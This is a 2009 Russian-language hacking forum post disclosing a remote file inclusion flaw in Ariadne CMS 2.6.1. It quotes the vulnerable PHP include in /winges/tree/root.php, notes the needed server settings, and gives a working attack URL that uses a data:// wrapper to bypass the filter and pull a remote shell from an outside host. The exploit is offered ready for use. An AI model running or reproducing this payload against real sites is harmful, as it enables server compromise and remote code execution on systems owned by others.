Показать сообщение отдельно

  #7  
Старый 12.12.2009, 23:54
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Product: Ariadne CMS
Author: http://www.ariadne-cms.org/
Version: 2.6.1
RFI

Need: register_globals = ON and allow_url_include = ON

file: /winges/tree/root.php
PHP код:
  if (!isset($layout) || (!$layout)) {
    
$layout="./frames.js";
  } else {
    
$layout=ereg_replace("[\./\\]","",$layout).".js";
  }
  include(
$layout); 
По сути есть фильтр,но Ctacok научил юзать data://, поэтому обход прост.
target: ?layout=data:,<?php include $_GET[hello] ?>&hello=http://yousite.com/shell.txt?

Последний раз редактировалось m0Hze; 13.12.2009 в 00:16..
 
Ответить с цитированием